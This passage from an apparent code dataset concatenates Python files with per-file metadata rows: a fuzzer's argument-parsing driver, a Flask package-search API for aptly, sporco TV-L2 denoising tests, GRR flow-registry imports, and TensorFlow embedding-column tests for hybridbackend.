f = fuzzer.Fuzzer(self.function, args.dirs, args.exact_artifact_path,
args.rss_limit_mb, args.timeout, args.regression, args.max_input_size,
args.close_fd_mask, args.runs, args.dict, args.inf_run, args.sched) #, self._fname)
f.start()
class PythonFuzzFile(object):
def __init__(self, func):
self.function = func
self._fname = "tempfile"
def _fuzzfile(self):
return self._fname
def __call__(self, *args, **kwargs):
parser = argparse.ArgumentParser(description='Coverage-guided fuzzer for python packages')
parser.add_argument('dirs', type=str, nargs='*',
help="one or more directories/files to use as seed corpus. the first directory will be used to save the generated test-cases")
parser.add_argument('--exact-artifact-path', type=str, help='set exact artifact path for crashes/ooms')
parser.add_argument('--regression',
type=bool,
default=False,
help='run the fuzzer through set of files for regression or reproduction')
parser.add_argument('--rss-limit-mb', type=int, default=4096, help='Memory usage in MB')
parser.add_argument('--max-input-size', type=int, default=4096, help='Max input size in bytes')
parser.add_argument('--dict', type=str, help='dictionary file')
parser.add_argument('--close-fd-mask', type=int, default=0, help='Indicate output streams to close at startup')
parser.add_argument('--runs', type=int, default=-1, help='Number of individual test runs, -1 (the default) to run indefinitely.')
parser.add_argument('--timeout', type=int, default=5,
help='If input takes longer then this timeout the process is treated as failure case')
parser.add_argument('--inf-run', default=False, action='store_true', help='Decide the fuzzing wherter stop or keep runing after it finds a failure') # added
parser.add_argument('--fname', type=str, default=None, help='Specific file name for PythonfuzzFile driver') # added
args = parser.parse_args()
if args.fname:
self._fname = args.fname
print("MAIN fname: ", self._fname)
f = fuzzer.Fuzzer(self.function, args.dirs, args.exact_artifact_path,
args.rss_limit_mb, args.timeout, args.regression, args.max_input_size,
args.close_fd_mask, args.runs, args.dict, args.inf_run, self._fname)
f.start()
'''
@PythonFuzz
def PythonfuzzFile():
pass
'''
if __name__ == '__main__':
PythonFuzz()
| 55.048193
| 164
| 0.640403
| 590
| 4,569
| 4.832203
| 0.235593
| 0.069449
| 0.131182
| 0.025254
| 0.876885
| 0.844616
| 0.844616
| 0.844616
| 0.81866
| 0.81866
| 0
| 0.006946
| 0.243817
| 4,569
| 82
| 165
| 55.719512
| 0.818234
| 0.008098
| 0
| 0.730159
| 0
| 0.031746
| 0.341376
| 0.009383
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079365
| false
| 0
| 0.047619
| 0.015873
| 0.174603
| 0.015873
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
491c98531bbdc0a047056b339097a2cbf3a02974
| 1,913
|
py
|
Python
|
aptlyweb/resources/package_search.py
|
istarion/aptly-web
|
6e782f7050b61e34d67a76fe1cc171d5db415d36
|
[
"Apache-2.0"
] | null | null | null |
aptlyweb/resources/package_search.py
|
istarion/aptly-web
|
6e782f7050b61e34d67a76fe1cc171d5db415d36
|
[
"Apache-2.0"
] | 1
|
2018-04-10T14:02:35.000Z
|
2018-04-14T17:30:27.000Z
|
aptlyweb/resources/package_search.py
|
istarion/aptly-web
|
6e782f7050b61e34d67a76fe1cc171d5db415d36
|
[
"Apache-2.0"
] | null | null | null |
from flask_restful import Resource, reqparse
from flask_restful import abort
from aptlyweb.resources import pyptly_api
from flask_security import login_required
class PackageSearch(Resource):
@staticmethod
@login_required
def get(query):
result = []
for rep in pyptly_api.get_local_repos:
repo_found = pyptly_api.show_repo_packages(rep["Name"], q="Name (~ .*{QUERY}.*)".format(QUERY=query))
if repo_found:
result.append({
"container_type": "Repository",
"container_name": rep["Name"],
"packages": repo_found
})
for snap in pyptly_api.get_snapshots():
snap_found = pyptly_api.show_snapshot_packages(snap["Name"], q="Name (~ .*{QUERY}.*)".format(QUERY=query))
if snap_found:
result.append({
"container_type": "Snapshot",
"container_name": snap["Name"],
"packages": snap_found
})
return result
class PackageAdvancedSearch(Resource):
@staticmethod
@login_required
def get(query):
result = []
for rep in pyptly_api.get_local_repos:
repo_found = pyptly_api.show_repo_packages(rep["Name"], q=query)
if repo_found:
result.append({
"container_type": "Repository",
"container_name": rep["Name"],
"packages": repo_found
})
for snap in pyptly_api.get_snapshots():
snap_found = pyptly_api.show_snapshot_packages(snap["Name"], q=query)
if snap_found:
result.append({
"container_type": "Snapshot",
"container_name": snap["Name"],
"packages": snap_found
})
return result
| 34.781818
| 118
| 0.544694
| 189
| 1,913
| 5.253968
| 0.227513
| 0.081571
| 0.04431
| 0.056395
| 0.817724
| 0.817724
| 0.817724
| 0.817724
| 0.777442
| 0.777442
| 0
| 0
| 0.351803
| 1,913
| 54
| 119
| 35.425926
| 0.800806
| 0
| 0
| 0.791667
| 0
| 0
| 0.13173
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.083333
| 0
| 0.208333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4927b145c69cb0354b732eeb78976ba4a56e3751
| 5,778
|
py
|
Python
|
tests/admm/test_tvl2.py
|
manvhah/sporco
|
9237d7fc37e75089a2a65ebfe02b7491410da7d4
|
[
"BSD-3-Clause"
] | 1
|
2019-07-23T11:27:41.000Z
|
2019-07-23T11:27:41.000Z
|
tests/admm/test_tvl2.py
|
wxwoods/sporco
|
7b0eefea8b6c720ab9a4998a7c55237445765738
|
[
"BSD-3-Clause"
] | null | null | null |
tests/admm/test_tvl2.py
|
wxwoods/sporco
|
7b0eefea8b6c720ab9a4998a7c55237445765738
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import division
from builtins import object
from past.utils import old_div
import numpy as np
from sporco.admm import tvl2
import sporco.metric as sm
class TestSet01(object):
def setup_method(self, method):
np.random.seed(12345)
self.D = np.random.randn(16, 15)
def test_01(self):
lmbda = 3
try:
b = tvl2.TVL2Denoise(self.D, lmbda)
b.solve()
except Exception as e:
print(e)
assert 0
def test_02(self):
lmbda = 3
try:
b = tvl2.TVL2Deconv(np.ones((1, 1)), self.D, lmbda)
b.solve()
except Exception as e:
print(e)
assert 0
def test_03(self):
lmbda = 3
dt = np.float16
opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'MaxMainIter': 20,
'AutoRho': {'Enabled': True}, 'DataType': dt})
b = tvl2.TVL2Denoise(self.D, lmbda, opt=opt)
b.solve()
assert b.X.dtype == dt
assert b.Y.dtype == dt
assert b.U.dtype == dt
def test_04(self):
lmbda = 3
dt = np.float32
opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'MaxMainIter': 20,
'AutoRho': {'Enabled': True}, 'DataType': dt})
b = tvl2.TVL2Denoise(self.D, lmbda, opt=opt)
b.solve()
assert b.X.dtype == dt
assert b.Y.dtype == dt
assert b.U.dtype == dt
def test_05(self):
lmbda = 3
dt = np.float64
opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'MaxMainIter': 20,
'AutoRho': {'Enabled': True}, 'DataType': dt})
b = tvl2.TVL2Denoise(self.D, lmbda, opt=opt)
b.solve()
assert b.X.dtype == dt
assert b.Y.dtype == dt
assert b.U.dtype == dt
def test_06(self):
lmbda = 3
dt = np.float32
opt = tvl2.TVL2Deconv.Options({'Verbose': False, 'MaxMainIter': 20,
'AutoRho': {'Enabled': True}, 'DataType': dt})
b = tvl2.TVL2Deconv(np.ones((1, 1)), self.D, lmbda, opt=opt)
b.solve()
assert b.X.dtype == dt
assert b.Y.dtype == dt
assert b.U.dtype == dt
def test_07(self):
lmbda = 3
dt = np.float64
opt = tvl2.TVL2Deconv.Options({'Verbose': False, 'MaxMainIter': 20,
'AutoRho': {'Enabled': True}, 'DataType': dt})
b = tvl2.TVL2Deconv(np.ones((1, 1)), self.D, lmbda, opt=opt)
b.solve()
assert b.X.dtype == dt
assert b.Y.dtype == dt
assert b.U.dtype == dt
class TestSet02(object):
def setup_method(self, method):
np.random.seed(12345)
N = 64
self.U = np.ones((N, N))
self.U[:, 0:(old_div(N, 2))] = -1
self.V = 1e-1 * np.random.randn(N, N)
self.D = self.U + self.V
def test_01(self):
lmbda = 1e-1
opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'gEvalY': False,
'MaxMainIter': 300, 'rho': 75*lmbda})
b = tvl2.TVL2Denoise(self.D, lmbda, opt)
X = b.solve()
assert np.abs(b.itstat[-1].ObjFun - 32.875710674129564) < 1e-3
assert sm.mse(self.U, X) < 1e-3
def test_02(self):
lmbda = 1e-1
opt = tvl2.TVL2Deconv.Options({'Verbose': False, 'gEvalY': False,
'MaxMainIter': 250})
b = tvl2.TVL2Deconv(np.ones((1)), self.D, lmbda, opt)
X = b.solve()
assert np.abs(b.itstat[-1].ObjFun - 45.45958573088) < 1e-3
assert sm.mse(self.U, X) < 1e-3
class TestSet03(object):
def setup_method(self, method):
np.random.seed(12345)
N = 32
self.U = np.ones((N, N, N))
self.U[:, 0:(old_div(N, 2)), :] = -1
self.V = 1e-1 * np.random.randn(N, N, N)
self.D = self.U + self.V
def test_01(self):
lmbda = 1e-1
opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'gEvalY': False,
'MaxMainIter': 250, 'rho': 10*lmbda})
b = tvl2.TVL2Denoise(self.D, lmbda, opt, axes=(0, 1))
X = b.solve()
assert np.abs(b.itstat[-1].ObjFun - 363.0802047) < 1e-3
assert sm.mse(self.U, X) < 1e-3
def test_02(self):
lmbda = 1e-1
opt = tvl2.TVL2Deconv.Options({'Verbose': False, 'gEvalY': False,
'MaxMainIter': 250})
b = tvl2.TVL2Deconv(np.ones((1)), self.D, lmbda, opt, axes=(0, 1))
X = b.solve()
assert np.abs(b.itstat[-1].ObjFun - 564.1586542) < 1e-3
assert sm.mse(self.U, X) < 1e-3
class TestSet04(object):
def setup_method(self, method):
np.random.seed(12345)
N = 32
self.U = np.ones((N, N, N))
self.U[:, 0:(old_div(N, 2)), :] = -1
self.V = 1e-1 * np.random.randn(N, N, N)
self.D = self.U + self.V
def test_01(self):
lmbda = 1e-1
opt = tvl2.TVL2Denoise.Options({'Verbose': False, 'gEvalY': False,
'MaxMainIter': 250, 'rho': 10*lmbda})
b = tvl2.TVL2Denoise(self.D, lmbda, opt, axes=(0, 1, 2))
X = b.solve()
assert np.abs(b.itstat[-1].ObjFun - 366.04267554965134) < 1e-3
assert sm.mse(self.U, X) < 1e-3
def test_02(self):
lmbda = 1e-1
opt = tvl2.TVL2Deconv.Options({'Verbose': False, 'gEvalY': False,
'MaxMainIter': 250})
b = tvl2.TVL2Deconv(np.ones((1)), self.D, lmbda, opt, axes=(0, 1, 2))
X = b.solve()
assert np.abs(b.itstat[-1].ObjFun - 567.72425227) < 1e-3
assert sm.mse(self.U, X) < 1e-3
| 29.479592
| 77
| 0.507269
| 781
| 5,778
| 3.720871
| 0.131882
| 0.02925
| 0.044735
| 0.049209
| 0.894357
| 0.885754
| 0.867515
| 0.867515
| 0.831383
| 0.831383
| 0
| 0.084012
| 0.340775
| 5,778
| 195
| 78
| 29.630769
| 0.678918
| 0
| 0
| 0.756757
| 0
| 0
| 0.061094
| 0
| 0
| 0
| 0
| 0
| 0.195946
| 1
| 0.114865
| false
| 0
| 0.040541
| 0
| 0.182432
| 0.013514
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
494c29b16772dd8e396d491f7bc2ec6f59d4bbad
| 1,643
|
py
|
Python
|
grr/server/grr_response_server/flows/general/registry_init.py
|
Onager/grr
|
646196bbfb332e4cb546b6d0fe1c09b57c675f7d
|
[
"Apache-2.0"
] | null | null | null |
grr/server/grr_response_server/flows/general/registry_init.py
|
Onager/grr
|
646196bbfb332e4cb546b6d0fe1c09b57c675f7d
|
[
"Apache-2.0"
] | null | null | null |
grr/server/grr_response_server/flows/general/registry_init.py
|
Onager/grr
|
646196bbfb332e4cb546b6d0fe1c09b57c675f7d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""Load all flows so that they are visible in the registry.
"""
# pylint: disable=unused-import
# These imports populate the Flow registry
from grr.server.grr_response_server.flows.general import administrative
from grr.server.grr_response_server.flows.general import artifact_fallbacks
from grr.server.grr_response_server.flows.general import audit
from grr.server.grr_response_server.flows.general import ca_enroller
from grr.server.grr_response_server.flows.general import checks
from grr.server.grr_response_server.flows.general import collectors
from grr.server.grr_response_server.flows.general import discovery
from grr.server.grr_response_server.flows.general import export
from grr.server.grr_response_server.flows.general import file_finder
from grr.server.grr_response_server.flows.general import filesystem
from grr.server.grr_response_server.flows.general import filetypes
from grr.server.grr_response_server.flows.general import find
from grr.server.grr_response_server.flows.general import fingerprint
from grr.server.grr_response_server.flows.general import hardware
from grr.server.grr_response_server.flows.general import memory
from grr.server.grr_response_server.flows.general import network
from grr.server.grr_response_server.flows.general import processes
from grr.server.grr_response_server.flows.general import registry
from grr.server.grr_response_server.flows.general import transfer
from grr.server.grr_response_server.flows.general import webhistory
from grr.server.grr_response_server.flows.general import windows_vsc
from grr.server.grr_response_server.flows.general import yara_flows
| 49.787879
| 75
| 0.864881
| 250
| 1,643
| 5.488
| 0.212
| 0.112245
| 0.208455
| 0.25656
| 0.781341
| 0.781341
| 0.781341
| 0.781341
| 0.781341
| 0.081633
| 0
| 0
| 0.071211
| 1,643
| 32
| 76
| 51.34375
| 0.899083
| 0.090079
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.045455
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
49543776833869fefe4d774fed23db632f5a4f79
| 21,918
|
py
|
Python
|
hybridbackend/tensorflow/feature_column/dense_features_test.py
|
fuhailin/HybridBackend
|
113383c5870b7180fa67c194208a27f76bdbf3f0
|
[
"Apache-2.0"
] | 38
|
2021-12-01T06:54:36.000Z
|
2022-03-23T11:23:21.000Z
|
hybridbackend/tensorflow/feature_column/dense_features_test.py
|
fuhailin/HybridBackend
|
113383c5870b7180fa67c194208a27f76bdbf3f0
|
[
"Apache-2.0"
] | 15
|
2021-12-01T09:15:26.000Z
|
2022-03-28T02:49:21.000Z
|
hybridbackend/tensorflow/feature_column/dense_features_test.py
|
fuhailin/HybridBackend
|
113383c5870b7180fa67c194208a27f76bdbf3f0
|
[
"Apache-2.0"
] | 8
|
2021-12-02T01:16:14.000Z
|
2022-01-28T04:51:16.000Z
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''Tests for embedding columns.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import os
import hybridbackend.test as hbtest
import unittest
# pylint: disable=missing-docstring
# pylint: disable=import-outside-toplevel
def _test_get_dense_tensor(_):
import tensorflow as tf
import hybridbackend.tensorflow as hb
# Inputs.
vocabulary_size = 3
sparse_input = tf.SparseTensorValue(
indices=((0, 0), (1, 0), (1, 4), (3, 0)),
values=(2, 0, 1, 1),
dense_shape=(4, 5))
# Embedding variable.
embedding_dimension = 2
embedding_values = (
(1., 2.), # id 0
(3., 5.), # id 1
(7., 11.) # id 2
)
def _initializer(shape, dtype, partition_info):
np.testing.assert_equal((vocabulary_size, embedding_dimension), shape)
np.testing.assert_equal(tf.float32, dtype)
np.testing.assert_equal(partition_info, None)
return embedding_values
with tf.Graph().as_default():
with hb.scope():
# Build columns.
categorical_column = tf.feature_column.categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
emb_col = tf.feature_column.embedding_column(
categorical_column,
embedding_dimension,
initializer=_initializer,
combiner='mean')
# Provide sparse input and get dense result.
embedding_lookup = hb.keras.layers.DenseFeatures(
[emb_col])({'aaa': sparse_input})
with hb.train.monitored_session() as sess:
return sess.run(embedding_lookup)
def _test_get_dense_tensor_sharded(rank):
import tensorflow as tf
import hybridbackend.tensorflow as hb
# Inputs.
vocabulary_size = 3
sparse_input = tf.SparseTensorValue(
indices=((0, 0), (1, 0), (1, 4), (3, 0)),
values=(2, 0, 1, 1),
dense_shape=(4, 5))
# Embedding variable.
embedding_dimension = 2
embedding_values_0 = (
(1., 2.), # id 0
(7., 11.), # id 2
)
embedding_values_1 = (
(3., 5.), # id 1
)
def _initializer_0(shape, dtype, partition_info):
np.testing.assert_equal((2, embedding_dimension), shape)
np.testing.assert_equal(tf.float32, dtype)
np.testing.assert_equal(partition_info, None)
return embedding_values_0
def _initializer_1(shape, dtype, partition_info):
np.testing.assert_equal((1, embedding_dimension), shape)
np.testing.assert_equal(tf.float32, dtype)
np.testing.assert_equal(partition_info, None)
return embedding_values_1
with tf.Graph().as_default():
with hb.scope():
categorical_column = tf.feature_column.categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
emb_col = tf.feature_column.embedding_column(
categorical_column,
embedding_dimension,
initializer=_initializer_0 if rank == 0 else _initializer_1,
combiner='mean')
# Provide sparse input and get dense result.
embedding_lookup = hb.keras.layers.DenseFeatures(
[emb_col])({'aaa': sparse_input})
with hb.train.monitored_session() as sess:
return sess.run(embedding_lookup)
def _test_get_dense_tensor_with_varscope(rank):
import tensorflow as tf
import hybridbackend.tensorflow as hb
# Inputs.
vocabulary_size = 3
sparse_input = tf.SparseTensorValue(
indices=((0, 0), (1, 0), (1, 4), (3, 0)),
values=(2, 0, 1, 1),
dense_shape=(4, 5))
# Embedding variable.
embedding_dimension = 2
embedding_values_0 = (
(1., 2.), # id 0
(7., 11.), # id 2
)
embedding_values_1 = (
(3., 5.), # id 1
)
def _initializer_0(shape, dtype, partition_info):
np.testing.assert_equal((1, embedding_dimension), shape)
np.testing.assert_equal(tf.float32, dtype)
return [embedding_values_0[partition_info.var_offset[0]]]
def _initializer_1(shape, dtype, partition_info):
del partition_info
np.testing.assert_equal((1, embedding_dimension), shape)
np.testing.assert_equal(tf.float32, dtype)
return embedding_values_1
with tf.Graph().as_default():
with hb.scope():
partitioner = tf.min_max_variable_partitioner(
max_partitions=2, min_slice_size=4)
with tf.variable_scope('test', partitioner=partitioner):
categorical_column = tf.feature_column.categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
emb_col = tf.feature_column.embedding_column(
categorical_column,
embedding_dimension,
initializer=_initializer_0 if rank == 0 else _initializer_1,
combiner='mean')
# Provide sparse input and get dense result.
embedding_lookup = hb.keras.layers.DenseFeatures(
[emb_col])({'aaa': sparse_input})
with hb.train.monitored_session() as sess:
return sess.run(embedding_lookup)
def _test_embedding_column_with_optimizer(_, lr):
import tensorflow as tf
import hybridbackend.tensorflow as hb
with tf.Graph().as_default():
with hb.scope(seed=42):
columns = [
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad0', num_buckets=10, default_value=0),
dimension=20,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad1', num_buckets=10, default_value=0),
dimension=30,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad2', num_buckets=10, default_value=0),
dimension=40,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='user0', num_buckets=10, default_value=0),
dimension=20,
initializer=tf.constant_initializer(0.5)),
]
features = {
'ad0': tf.constant([0, 1, 3, 2]),
'ad1': tf.constant([1, 5, 3, 4]),
'ad2': tf.constant([5, 2, 7, 4]),
'user0': tf.constant([2, 5, 4, 7])
}
out_emb = hb.keras.layers.DenseFeatures(
columns, num_groups=None)(features)
loss = tf.reduce_mean(out_emb)
opt = tf.train.AdamOptimizer(lr)
step = tf.train.get_or_create_global_step()
train_op = opt.minimize(loss, global_step=step)
final_loss = None
with hb.train.monitored_session(
hooks=[
opt.make_session_run_hook(),
tf.train.StopAtStepHook(last_step=100),
tf.train.NanTensorHook(loss),
tf.train.LoggingTensorHook(
tensors={'loss': loss, 'step': step},
every_n_iter=20)]) as sess:
while not sess.should_stop():
final_loss = sess.run(loss)
sess.run(train_op)
return final_loss
def _test_get_dense_tensor_disable_concat(_):
import tensorflow as tf
import hybridbackend.tensorflow as hb
with tf.Graph().as_default():
with hb.scope(emb_enable_concat=False):
columns = [
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad0', num_buckets=10, default_value=0),
dimension=20,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='user0', num_buckets=10, default_value=0),
dimension=20,
initializer=tf.constant_initializer(0.5)),
]
features = {
'ad0': tf.sparse.SparseTensor(
values=[0, 1, 3, 2],
indices=[[0, 0], [0, 1], [1, 0], [1, 1]],
dense_shape=[2, 2]),
'user0': tf.constant([2, 5, 4, 7])
}
embs = hb.keras.layers.DenseFeatures(columns)(features)
with hb.train.monitored_session() as sess:
return sess.run(embs)
def _test_embedding_column_with_coalescing(_, lr):
os.environ['HYBRIDBACKEND_DEFAULT_COMM'] = 'NCCL'
import tensorflow as tf
import hybridbackend.tensorflow as hb
with tf.Graph().as_default():
with hb.scope(seed=42):
columns = [
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad0', num_buckets=10, default_value=0),
dimension=20,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad1', num_buckets=10, default_value=0),
dimension=30,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad2', num_buckets=10, default_value=0),
dimension=40,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='user0', num_buckets=10, default_value=0),
dimension=20,
initializer=tf.constant_initializer(0.5)),
]
features = {
'ad0': tf.constant([0, 1, 3, 2]),
'ad1': tf.constant([1, 5, 3, 4]),
'ad2': tf.constant([5, 2, 7, 4]),
'user0': tf.constant([2, 5, 4, 7])
}
out_emb = hb.keras.layers.DenseFeatures(columns, num_groups=2)(features)
loss = tf.reduce_mean(out_emb)
opt = tf.train.AdamOptimizer(lr)
step = tf.train.get_or_create_global_step()
train_op = opt.minimize(loss, global_step=step)
final_loss = None
with hb.train.monitored_session(
hooks=[
opt.make_session_run_hook(),
tf.train.StopAtStepHook(last_step=100),
tf.train.NanTensorHook(loss),
tf.train.LoggingTensorHook(
tensors={'loss': loss, 'step': step},
every_n_iter=20)]) as sess:
while not sess.should_stop():
final_loss = sess.run(loss)
sess.run(train_op)
return final_loss
def _test_embedding_column_with_function(_, lr):
os.environ['HYBRIDBACKEND_DEFAULT_COMM'] = 'NCCL'
import tensorflow as tf
import hybridbackend.tensorflow as hb
@hb.function(seed=42, emb_num_groups=2)
def train_fn():
columns = [
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad0', num_buckets=10, default_value=0),
dimension=20,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad1', num_buckets=10, default_value=0),
dimension=30,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad2', num_buckets=10, default_value=0),
dimension=40,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='user0', num_buckets=10, default_value=0),
dimension=20,
initializer=tf.constant_initializer(0.5)),
]
features = {
'ad0': tf.constant([0, 1, 3, 2]),
'ad1': tf.constant([1, 5, 3, 4]),
'ad2': tf.constant([5, 2, 7, 4]),
'user0': tf.constant([2, 5, 4, 7])
}
out_emb = hb.keras.layers.DenseFeatures(columns)(features)
loss = tf.reduce_mean(out_emb)
opt = tf.train.AdamOptimizer(lr)
step = tf.train.get_or_create_global_step()
return loss, opt.minimize(loss, global_step=step)
loss, train_op = train_fn()
final_loss = None
with hb.train.monitored_session(
hooks=[
tf.train.StopAtStepHook(last_step=100),
tf.train.NanTensorHook(loss),
tf.train.LoggingTensorHook(
tensors={'loss': loss},
every_n_iter=20)]) as sess:
while not sess.should_stop():
final_loss = sess.run(loss)
sess.run(train_op)
return final_loss
def _test_embedding_column_with_function_unique(_, lr):
os.environ['HYBRIDBACKEND_DEFAULT_COMM'] = 'NCCL'
import tensorflow as tf
import hybridbackend.tensorflow as hb
@hb.function(seed=42, emb_num_groups=2, emb_unique={'ad0': True})
def train_fn():
columns = [
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad0', num_buckets=10, default_value=0),
dimension=20,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad1', num_buckets=10, default_value=0),
dimension=30,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad2', num_buckets=10, default_value=0),
dimension=40,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='user0', num_buckets=10, default_value=0),
dimension=20,
initializer=tf.constant_initializer(0.5)),
]
features = {
'ad0': tf.constant([0, 1, 3, 2]),
'ad1': tf.constant([1, 5, 3, 4]),
'ad2': tf.constant([5, 2, 7, 4]),
'user0': tf.constant([2, 5, 4, 7])
}
out_emb = hb.keras.layers.DenseFeatures(columns)(features)
loss = tf.reduce_mean(out_emb)
opt = tf.train.AdamOptimizer(lr)
step = tf.train.get_or_create_global_step()
return loss, opt.minimize(loss, global_step=step)
loss, train_op = train_fn()
final_loss = None
with hb.train.monitored_session(
hooks=[
tf.train.StopAtStepHook(last_step=100),
tf.train.NanTensorHook(loss),
tf.train.LoggingTensorHook(
tensors={'loss': loss},
every_n_iter=20)]) as sess:
while not sess.should_stop():
final_loss = sess.run(loss)
sess.run(train_op)
return final_loss
def _test_get_dense_tensor_with_segment_rank(rank):
import tensorflow as tf
import hybridbackend.tensorflow as hb
# Inputs.
vocabulary_size = 3
sparse_input = tf.SparseTensorValue(
indices=((0, 1, 1), (0, 1, 2), (1, 1, 1), (1, 1, 2)),
values=(2, 0, 1, 1),
dense_shape=(4, 2, 3))
# Embedding variable.
embedding_dimension = 2
embedding_values_0 = (
(1., 2.), # id 0
(7., 11.), # id 2
)
embedding_values_1 = (
(3., 5.), # id 1
)
def _initializer_0(shape, dtype, partition_info):
np.testing.assert_equal((2, embedding_dimension), shape)
np.testing.assert_equal(tf.float32, dtype)
np.testing.assert_equal(partition_info, None)
return embedding_values_0
def _initializer_1(shape, dtype, partition_info):
np.testing.assert_equal((1, embedding_dimension), shape)
np.testing.assert_equal(tf.float32, dtype)
np.testing.assert_equal(partition_info, None)
return embedding_values_1
@hb.function(emb_segment_rank={'aaa': 1})
def lookup_fn():
categorical_column = tf.feature_column.categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
emb_col = tf.feature_column.embedding_column(
categorical_column,
embedding_dimension,
initializer=_initializer_0 if rank == 0 else _initializer_1,
combiner='mean')
return hb.keras.layers.DenseFeatures([emb_col])({'aaa': sparse_input})
with tf.Graph().as_default():
embs = lookup_fn()
with hb.train.monitored_session() as sess:
return sess.run(embs)
def _test_shared_embedding_column(_, lr):
import tensorflow as tf
import hybridbackend.tensorflow as hb
with tf.Graph().as_default():
with hb.scope(seed=42):
columns = [
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad1', num_buckets=10, default_value=0),
dimension=30,
initializer=tf.constant_initializer(0.5)),
tf.feature_column.embedding_column(
tf.feature_column.categorical_column_with_identity(
key='ad2', num_buckets=10, default_value=0),
dimension=40,
initializer=tf.constant_initializer(0.5)),
]
columns += tf.feature_column.shared_embedding_columns(
[
tf.feature_column.categorical_column_with_identity(
key='ad0', num_buckets=10, default_value=0),
tf.feature_column.categorical_column_with_identity(
key='user0', num_buckets=10, default_value=0)],
dimension=20,
initializer=tf.constant_initializer(0.5))
features = {
'ad0': tf.constant([0, 1, 3, 2]),
'ad1': tf.constant([1, 5, 3, 4]),
'ad2': tf.constant([5, 2, 7, 4]),
'user0': tf.constant([2, 5, 4, 7])
}
out_emb = hb.keras.layers.DenseFeatures(columns)(features)
loss = tf.reduce_mean(out_emb)
opt = tf.train.AdamOptimizer(lr)
step = tf.train.get_or_create_global_step()
train_op = opt.minimize(loss, global_step=step)
final_loss = None
with hb.train.monitored_session(
hooks=[
opt.make_session_run_hook(),
tf.train.StopAtStepHook(last_step=100),
tf.train.NanTensorHook(loss),
tf.train.LoggingTensorHook(
tensors={'loss': loss, 'step': step},
every_n_iter=20)]) as sess:
while not sess.should_stop():
final_loss = sess.run(loss)
sess.run(train_op)
